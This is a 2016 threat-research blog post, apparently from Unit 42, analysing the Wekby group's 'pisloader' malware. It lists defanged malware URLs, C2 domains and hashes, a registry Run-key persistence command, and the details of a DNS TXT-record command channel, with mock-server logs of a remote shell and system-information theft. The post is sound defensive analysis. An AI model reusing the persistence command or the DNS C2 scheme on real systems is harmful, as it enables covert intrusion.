{"id":1292,"date":"2016-05-24T18:30:30","date_gmt":"2016-05-24T18:30:30","guid":{"rendered":"https:\/\/www.paloaltonetworks.com\/blog\/?p=13911"},"modified":"2023-06-06T23:55:23","modified_gmt":"2023-06-06T23:55:23","slug":"new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism","status":"publish","type":"post","link":"https:\/\/ddi.mohflo.net\/index.php\/2016\/05\/24\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism\/","title":{"rendered":"New Wekby Attacks Use DNS Requests As Command and Control Mechanism"},"content":{"rendered":"<p class=\"wpml-ls-statics-post_translations wpml-ls\">This post is also available in: <span class=\"wpml-ls-slot-post_translations wpml-ls-item wpml-ls-item-ja wpml-ls-first-item wpml-ls-last-item wpml-ls-item-legacy-post-translations\"><a href=\"https:\/\/unit42.paloaltonetworks.jp\/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism\/\" class=\"wpml-ls-link\"><span class=\"wpml-ls-native\" lang=\"ja\">\u65e5\u672c\u8a9e<\/span><span class=\"wpml-ls-display\"><span class=\"wpml-ls-bracket\"> (<\/span>Japanese<span class=\"wpml-ls-bracket\">)<\/span><\/span><\/a><\/span><\/p>\n<p>We have observed an attack led by the APT group Wekby targeting a US-based organization in recent weeks. Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of <a href=\"https:\/\/www.volexity.com\/blog\/?p=158\" target=\"_blank\" rel=\"noopener\">HackingTeam\u2019s Flash zero-day exploit<\/a>.<\/p>\n<p>The malware used by the Wekby group has ties to the <a href=\"https:\/\/www.zscaler.com\/blogs\/research\/chinese-cyber-espionage-apt-group-leveraging-recently-leaked-hacking-team-exploits-target-financial-services-firm\" target=\"_blank\" rel=\"noopener\">HTTPBrowser<\/a> malware family, and uses DNS requests as a command and control mechanism. Additionally, it uses various obfuscation techniques to thwart researchers during analysis. Based on metadata seen in the discussed samples, Palo Alto Networks has named this malware family \u2018pisloader\u2019.<span id=\"more-13911\"><\/span><\/p>\n<h3>Infrastructure<\/h3>\n<p>The pisloader malware family was delivered via HTTP from the following URL. At the time of writing, this URL was still active.<\/p>\n<p><em>http:\/\/globalprint-us[.]com\/proxy_plugin.exe&nbsp;<\/em><\/p>\n<p>Other samples hosted on this domain include the following:<\/p>\n<p><em>http:\/\/globalprint-us[.]com\/proxy_web_plugin.exe&nbsp;<\/em><\/p>\n<p><strong>MD5:<\/strong> E4968C8060EA017B5E5756C16B80B012<br \/><strong>SHA256:<\/strong> 8FFBB7A80EFA9EE79E996ABDE7A95CF8DC6F9A41F9026672A8DBD95539FEA82A<br \/><strong>Size:<\/strong> 126976 Bytes<br \/><strong>Compile Time:<\/strong> 2016-04-28 00:38:46 UTC<\/p>\n<p>This discovered file was found to be an instance of the common Poison Ivy malware family with the following configuration data:<\/p>\n<p><strong>Command and Control Address:<\/strong> intranetwabcam[.]com<br \/><strong>Command and Control Port:<\/strong> 80<br \/><strong>Password:<\/strong> admin<br \/><strong>Mutex:<\/strong> )!VoqA.I5<\/p>\n<p>The domains witnessed in this attack were all registered very shortly prior to being used. The following domains have been witnessed in this attack:<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-1.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" decoding=\"async\" class=\"size-large wp-image-13914 aligncenter\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism.png?resize=500%2C67&#038;ssl=1\" alt=\"Wekby Targets 1\" width=\"500\" height=\"67\"><\/a><\/p>\n<p>Additionally, the following IP resolutions have been observed.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-1.2.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"size-large wp-image-13917 aligncenter\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-1.png?resize=500%2C65&#038;ssl=1\" alt=\"Wekby Targets 1.2\" width=\"500\" height=\"65\"><\/a><\/p>\n<h3>Initial Dropper<\/h3>\n<p>The following sample was discovered initially and is referenced in the subsequent analysis:<\/p>\n<p><strong>MD5:<\/strong> E8D58AA76DD97536AC225949A2767E05<br \/><strong>SHA256:<\/strong> DA3261C332E72E4C1641CA0DE439AF280E064B224D950817A11922A8078B11F1<br \/><strong>Size:<\/strong> 126976 Bytes<br \/><strong>Compile Time:<\/strong> 2016-04-27 14:37:34 UTC<\/p>\n<p>This particular file has the following metadata properties. The references to \u2018pisload2\u2019 led to the naming of this malware family.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-2.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"size-large wp-image-13929 aligncenter\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-2.png?resize=500%2C622&#038;ssl=1\" alt=\"Wekby Targets 2\" width=\"500\" height=\"622\"><\/a><\/p>\n<p><em>Figure 1 pisloader dropper metadata<\/em><\/p>\n<p>The initial dropper contains very simple code that is responsible for setting persistence via the Run registry key, and dropping and executing an embedded Windows executable. Limited obfuscation was encountered, where the authors split up strings into smaller sub-strings and used \u2018strcpy\u2019 and \u2018strcat\u2019 calls to re-build them prior to use. They also used this same technique to generate garbage strings that are never used. This is likely to deter detection and analysis of the sample. The following decompiled code demonstrates this. Comments have been added to show the fully-generated strings.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-3.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-13923\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-3.png?resize=500%2C132&#038;ssl=1\" alt=\"Wekby Targets 3\" width=\"500\" height=\"132\"><\/a><\/p>\n<p><em>Figure 2 pisloader dropper building strings and setting persistence<\/em><\/p>\n<p>In the above decompiled code, we see that the pisloader is generating the following string, which eventually is called to set the Run registry key.<\/p>\n<p><em>cmd.exe \/c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v lsm \/t reg_sz \/d &#8220;%appdata%\\lsm.exe&#8221; \/f<\/em><\/p>\n<p>This particular command will set the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\lsm registry key with a value of \u201c%appdata%\\lsm.exe\u201d. After this key is set, the malware proceeds to decrypt a two blobs of data with a single-byte XOR key of 0x54. The resulting data is written to the %appdata%\\lsm.exe file path.<\/p>\n<p>After this file is written, the malware executes the newly written lsm.exe file, which contains the pisloader payload.<\/p>\n<h3>Payload<\/h3>\n<p>The following sample was discovered and is referenced in the subsequent analysis:<\/p>\n<p><strong>MD5:<\/strong> 07B9B62FB3B1C068837C188FEFBD5DE9<br \/><strong>SHA256:<\/strong> 456FFFC256422AD667CA023D694494881BAED1496A3067485D56ECC8FEFBFAEB<br \/><strong>Size:<\/strong> 102400 Bytes<br \/><strong>Compile Timestamp:<\/strong> 2016-04-27 13:39:02 UTC<\/p>\n<p>The payload is heavily obfuscated using a return-oriented programming (ROP) technique, as well as a number of garbage assembly instructions. In the example below, code highlighted in red essentially serves no purpose other than to deter reverse-engineering of the sample. This code can be treated as garbage and ignored. The entirety of the function is highlighted in green, where two function offsets are pushed to the stack, followed by a return instruction. This return instruction will point code execution first at the null function, which in turn will point code execution to the \u2018next_function\u2019. This technique is used throughout the runtime of the payload, making static analysis difficult.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-4.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-13926\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-4.png?resize=279%2C805&#038;ssl=1\" alt=\"Wekby Targets 4\" width=\"279\" height=\"805\" srcset=\"https:\/\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-8.png 279w, https:\/\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-9.png 104w\" sizes=\"auto, (max-width: 279px) 100vw, 279px\"><\/a><\/p>\n<p><em>Figure 3 Obfuscated code witnessed in pisloader<\/em><\/p>\n<p>The malware is actually quite simplistic once the obfuscation and garbage code is ignored. It will begin by generating a random 10-byte alpha-numeric header. The remaining data is base32-encoded, with padding removed. This data will be used to populate a subdomain that will be used in a subsequent DNS request for a TXT record.<\/p>\n<p>The use of DNS as a C2 protocol has historically not been widely adopted by malware authors. Notable exceptions include the following:<\/p>\n<p>The use of DNS as a C2 allows pisloader to bypass certain security products that may not be inspecting this traffic correctly.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-5.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-13932\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-5.png?resize=500%2C278&#038;ssl=1\" alt=\"Wekby Targets 5\" width=\"500\" height=\"278\"><\/a><\/p>\n<p><em>Figure 4 DNS query for TXT record by malware<\/em><\/p>\n<p>The pisloader sample will send a beacon periodically that is composed of a random 4-byte uppercase string that is used as the payload. An example of this can be found below:<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-6.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-13935\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-6.png?resize=500%2C130&#038;ssl=1\" alt=\"Wekby Targets 6\" width=\"500\" height=\"130\"><\/a><\/p>\n<p><em>Figure 5 pisloader DNS beacon request<\/em><\/p>\n<p>The malware expects various aspects of the DNS responses to be set in a specific way, or else pisloader will ignore the DNS reply. The following DNS flags must be set. Should any additional flags be set, the response will be ignored.<\/p>\n<ul>\n<li>Response<\/li>\n<li>Recursion Desired<\/li>\n<li>Recursion Available<\/li>\n<\/ul>\n<p>The \u2018Questions\u2019 field must be set to a value of 0x1. The \u2018Answer Resource Records\u2019 field must be set to a value of 0x1. Additionally, the response query subdomain must match the original DNS request.<\/p>\n<p>The remote command and control (C2) server is statically embedded within the malware. A single host of \u2018ns1.logitech-usa[.]com\u2019 is found in this specific sample.<\/p>\n<p>The C2 server will respond with a TXT record that is encoded similar to the initial request. In the response, the first byte is ignored, and the remaining data is base32-encoded. An example of this can be found below.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-7-.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-13938\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-7.png?resize=500%2C177&#038;ssl=1\" alt=\"Wekby Targets 7\" width=\"500\" height=\"177\"><\/a><\/p>\n<p><em>Figure 6 Example TXT response by C2 server<\/em><\/p>\n<p>The following commands, and their descriptions are supported by the malware:<\/p>\n<ul>\n<li>sifo \u2013 Collect victim system information<\/li>\n<li>drive \u2013 List drives on victim machine<\/li>\n<li>list \u2013 List file information for provided directory<\/li>\n<li>upload \u2013 Upload a file to the victim machine<\/li>\n<li>open \u2013 Spawn a command shell<\/li>\n<\/ul>\n<p>Some examples of these commands being used can be seen below. A mock DNS server was used to generate the commands and receive the resulting data.<\/p>\n<p><strong>Example sending the \u2018drive\u2019 command:<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta --> <\/p>\n<div id=\"crayon-647fb69c793ac046294519\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" readability=\"8\">\n<p><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly><br \/>\n[+] Sending Command: drive | Encoded: CMRZGS5TF<br \/>\n[+] Raw Data Received: UMAVMGAGD0IE5FY7CDHJOHYRB2LR6A<br \/>\n[+] Decoded Data Received: A:\\|C:\\|D:\\|<\/textarea><\/p>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\" readability=\"1.5\">\n<tr class=\"crayon-row\" readability=\"3\">\n<td class=\"crayon-nums \" data-settings=\"show\"> <\/td>\n<td class=\"crayon-code\" readability=\"6\">\n<div class=\"crayon-pre\" readability=\"11\">\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sending <\/span><span class=\"crayon-v\">Command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">drive<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Encoded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">CMRZGS5TF<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">UMAVMGAGD0IE5FY7CDHJOHYRB2LR6A<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Decoded <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">D<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-o\">|<\/span><\/p>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><!-- [Format Time: 0.0003 seconds] --><\/p>\n<p><strong>Example sending the \u2018open\u2019 command:<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta --> <\/p>\n<div id=\"crayon-647fb69c793b4099826902\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" readability=\"10\">\n<p><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly><br \/>\n[+] Sending Command: open | Encoded: CN5YGK3Q<br \/>\n[+] Raw Data Received: ULCBMGAGCAJVUWG4TPONXWM5BAK5UW4ZDPO5ZSAW2WMVZHG2LP<br \/>\n[+] Raw Data Received: ATABMGAGCBNYQDMLRRFY3TMMBRLUGQUQ3POB4XE2LHNB2CAKDD<br \/>\n[+] Raw Data Received: HTPDMGAGCCFEQDEMBQHEQE22LDOJXXG33GOQQEG33SOBXXEYLU<br \/>\n[+] Raw Data Received: BNJWMGAGCDNFXW4LRAEBAWY3BAOJUWO2DUOMQHEZLTMVZHMZLE<br \/>\n[+] Raw Data Received: UARCMGAGCEFYGQUDIKIM5FYVLTMVZHGXCKN5ZWQICHOJ2W46TX<br \/>\n[+] Raw Data Received: UJRAMGAGC0MVUWOXCEMVZWW5DPOA7A<br \/>\n[+] Decoded Data Received: Microsoft Windows [Version 6.1.7601]<br \/>\nCopyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\Users\\Josh Grunzweig\\Desktop&gt;<\/textarea><\/p>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\" readability=\"2.5\">\n<tr class=\"crayon-row\" readability=\"5\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<p>1<\/p>\n<p>2<\/p>\n<p>3<\/p>\n<p>4<\/p>\n<p>5<\/p>\n<p>6<\/p>\n<p>7<\/p>\n<p>8<\/p>\n<p>9<\/p>\n<p>10<\/p>\n<p>11<\/p>\n<\/div>\n<\/td>\n<td class=\"crayon-code\" readability=\"13\">\n<div class=\"crayon-pre\" readability=\"25\">\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sending <\/span><span class=\"crayon-v\">Command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">open<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Encoded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">CN5YGK3Q<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ULCBMGAGCAJVUWG4TPONXWM5BAK5UW4ZDPO5ZSAW2WMVZHG2LP<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ATABMGAGCBNYQDMLRRFY3TMMBRLUGQUQ3POB4XE2LHNB2CAKDD<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">HTPDMGAGCCFEQDEMBQHEQE22LDOJXXG33GOQQEG33SOBXXEYLU<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">BNJWMGAGCDNFXW4LRAEBAWY3BAOJUWO2DUOMQHEZLTMVZHMZLE<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">UARCMGAGCEFYGQUDIKIM5FYVLTMVZHGXCKN5ZWQICHOJ2W46TX<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">UJRAMGAGC0MVUWOXCEMVZWW5DPOA7A<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Decoded <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Microsoft <\/span><span class=\"crayon-i\">Windows<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-i\">Version<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1.7601<\/span><span class=\"crayon-sy\">]<\/span><\/p>\n<p><span class=\"crayon-e\">Copyright<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2009<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Microsoft <\/span><span class=\"crayon-v\">Corporation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">All <\/span><span class=\"crayon-e\">rights <\/span><span class=\"crayon-v\">reserved<\/span><span class=\"crayon-sy\">.<\/span><\/p>\n<p><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Users<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Josh <\/span><span class=\"crayon-v\">Grunzweig<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Desktop<\/span><span class=\"crayon-o\">&gt;<\/span><\/p>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><!-- [Format Time: 0.0010 seconds] --><\/p>\n<p><strong>Example sending the \u2018sifo\u2019 command:<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta --> <\/p>\n<div id=\"crayon-647fb69c793b7259386095\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" readability=\"12\">\n<p><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly><br \/>\n[+] Sending Command: sifo | Encoded: CONUWM3Y<br \/>\n[+] Raw Data Received: FUBWMGAGIANQ6TCNZSFYYTMLRRFYYTKMZGMM6VOSKOFVGEUTCW<br \/>\n[+] Raw Data Received: PGHRMGAGIBGJHEWSKPJNICAW2KN5ZWQICHOJ2W46TXMVUWOXJG<br \/>\n[+] Raw Data Received: MMAZMGAGI0N46TMLBRFQZTE<br \/>\n[+] Decoded Data Received: l=172.16.1.153&amp;c=WIN-LJLV2NKIOKP [Josh Grunzweig]&amp;o=6,1,32<\/textarea><\/p>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\" readability=\"3.5\">\n<tr class=\"crayon-row\" readability=\"7\">\n<td class=\"crayon-nums \" data-settings=\"show\"> <\/td>\n<td class=\"crayon-code\" readability=\"9\">\n<div class=\"crayon-pre\" readability=\"17\">\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sending <\/span><span class=\"crayon-v\">Command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sifo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Encoded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">CONUWM3Y<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">FUBWMGAGIANQ6TCNZSFYYTMLRRFYYTKMZGMM6VOSKOFVGEUTCW<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PGHRMGAGIBGJHEWSKPJNICAW2KN5ZWQICHOJ2W46TXMVUWOXJG<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Raw <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">MMAZMGAGI0N46TMLBRFQZTE<\/span><\/p>\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Decoded <\/span><span class=\"crayon-e\">Data <\/span><span class=\"crayon-v\">Received<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">l<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">172.16.1.153<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">WIN<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">LJLV2NKIOKP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">Josh <\/span><span class=\"crayon-v\">Grunzweig<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">32<\/span><\/p>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><!-- [Format Time: 0.0006 seconds] --><\/p>\n<p><strong>Example listing the contents of the C:\\ drive:<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta --> <\/p>\n<div id=\"crayon-647fb69c793b9651248932\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" readability=\"10\">\n<p><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly><br \/>\n[+] Sending Command: list C:\\ | Encoded: CNRUXG5BAIM5FY<br \/>\n[+] Raw Data Received: QKTUMGAGLAGB6CIUTFMN4WG3DFFZBGS3T4GIYDCNJPGAZS6MRW<br \/>\n[+] Raw Data Received: EKNPMGAGL0EAYTIORUGA5DKN34GB6DEMS6<br \/>\n[+] Raw Data Received: RKMAMGAGLAGF6GC5LUN5SXQZLDFZRGC5D4GIYDAOJPGA3C6MJQ<br \/>\n[+] Raw Data Received: NMSIMGAGL0EAZDCORUGI5DEMD4GI2HYMZSLY<br \/>\n[+] Raw Data Received: OHRWMGAGLAGB6EE33POR6DEMBRGUXTAMZPGI3CAMJWHIZDIORQ<br \/>\n[+] Raw Data Received: DPDUMGAGL0GJ6DA7BSGJPA<br \/>\n[+] Raw Data Received: WIKGMGAGLAGF6GE33PORWWO4T4GIYDCNBPGA3C6MRYEAYDAORS<br \/>\n* Truncated*<br \/>\n[+] Decoded Data Received: 0|$Recycle.Bin|2015\/03\/26 14:40:57|0|22^1|autoexec.bat|2009\/06\/10 21:42:20|24|32^0|Boot|2015\/03\/26 16:24:02|0|22^1|bootmgr|2014\/06\/28 